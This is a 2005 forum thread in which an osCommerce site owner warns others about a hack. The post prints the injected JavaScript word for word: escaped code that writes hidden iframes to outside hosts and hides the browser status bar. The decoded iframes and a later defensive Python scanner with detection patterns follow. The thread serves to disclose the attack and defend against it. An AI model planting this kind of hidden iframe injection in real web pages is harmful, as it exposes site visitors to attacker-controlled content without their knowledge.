bluetrope Posted November 30, 2005

One of my osCommerce sites was recently hacked. It's sneaky: a bit of escaped javascript is inserted at the end of (seemingly) all index.php pages in an osCommerce installation. The code is preceded by > 80 blanks, so it is not readily visible when editing without wordwrap. Here's the code:

<script language=javascript>function func(){if (window.status != " ") { window.status = " "; }} stop = window.setInterval("func()",7);</script><script language=javascript>document.write(unescape('%3c%49%46%52%41%4d%45%20%53%52%43%3d%22%68%74%74%70%3a%2f%2f%63%72%75%6e%65%74%2e%69%6e%66%6f%2f%6f%75%74%2e%70%68%70%3f%73%5f%69%64%3d%31%22%20%57%49%44%54%48%3d%30%20%42%4f%52%44%45%52%3d%30%20%48%45%49%47%48%54%3d%30%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%49%46%52%41%4d%45%3e%3c%49%46%52%41%4d%45%20%53%52%43%3d%22%68%74%74%70%3a%2f%2f%6f%6e%6c%69%6e%65%70%72%6f%78%69%65%73%2e%63%6f%6d%2f%6f%75%74%2e%70%68%70%3f%73%5f%69%64%3d%31%22%20%57%49%44%54%48%3d%30%20%42%4f%52%44%45%52%3d%30%20%48%45%49%47%48%54%3d%30%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%49%46%52%41%4d%45%3e'));</script>

Unescaped, you have a document.write of:

<IFRAME SRC=http://crunet.info/out.php?s_id=1" WIDTH=0 HEIGHT=0 style="display:none"></IFRAME>
<IFRAME SRC=http://onlineproxies.com/out.php?s_id=1" WIDTH=0 HEIGHT=0 style="display:none"></IFRAME>

which is doing god knows what on these servers (in Moscow and UK respectively). Beware! Symptoms are cookies originating from crunet.info and onlineproxies.com, and with certain versions of IE6 execution results in a redirect to http:/// and a 404.

-RN Snead
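A defender-side check for the pattern described in the post above, added here as an example and not part of the original thread: it flags index.php files where a long run of blanks precedes a script tag, and decodes any fully escaped document.write argument as text to list hidden iframe sources. The function names, the constructed sample page and the example.invalid host are assumptions made for illustration.

```python
import os
import re
from urllib.parse import unquote

# 80+ spaces/tabs directly before a <script> tag: the padding trick from the post.
PADDED_SCRIPT = re.compile(r"[ \t]{80,}(?=<script\b)", re.I)
# document.write(unescape('%xx%xx...')) whose argument is entirely percent-encoded.
ESCAPED_WRITE = re.compile(
    r"document\.write\(\s*unescape\(\s*(['\"])((?:%[0-9a-f]{2}){8,})\1\s*\)\s*\)", re.I)
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
HIDDEN = re.compile(r"(?:width|height)\s*=\s*[\"']?0\b|display\s*:\s*none", re.I)
SRC = re.compile(r"src\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def scan_text(text):
    """Report the padding trick and any hidden iframe sources in escaped writes."""
    found = {"padded_script": bool(PADDED_SCRIPT.search(text)), "hidden_iframe_srcs": []}
    for match in ESCAPED_WRITE.finditer(text):
        # JavaScript unescape() maps %xx to Latin-1; decode as text, never render it.
        decoded = unquote(match.group(2), encoding="latin-1")
        for tag in IFRAME.findall(decoded):
            src = SRC.search(tag)
            if src and HIDDEN.search(tag):
                found["hidden_iframe_srcs"].append(src.group(1))
    return found


def scan_tree(root, name="index.php"):
    """Scan every file called `name` under root; return {path: findings} for hits."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        if name in files:
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1") as fh:
                result = scan_text(fh.read())
            if result["padded_script"] or result["hidden_iframe_srcs"]:
                hits[path] = result
    return hits


# Constructed sample (not the payload from the post); example.invalid is a placeholder.
_MARKUP = ('<IFRAME SRC="http://example.invalid/out.php?s_id=1" WIDTH=0 BORDER=0 '
           'HEIGHT=0 style="display:none"></IFRAME>')
_ENCODED = "".join("%%%02x" % b for b in _MARKUP.encode("latin-1"))
SAMPLE_PAGE = ("<?php require('includes/application_top.php'); ?>\n" + " " * 90 +
               "<script>document.write(unescape('" + _ENCODED + "'));</script>\n")

if __name__ == "__main__":
    print(scan_text(SAMPLE_PAGE))
```

Comparing the files against a known-good copy of the installation remains the stronger check; this scan only recognises the specific padding and escaping pattern reported here.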
kirchenbauer Posted November 30, 2005

Thank you for warning everyone. Did you install the newest security release that came out about a week or two weeks ago? I don't know if that release addresses this problem or not, but thought I'd mention it. Thanks for the warning...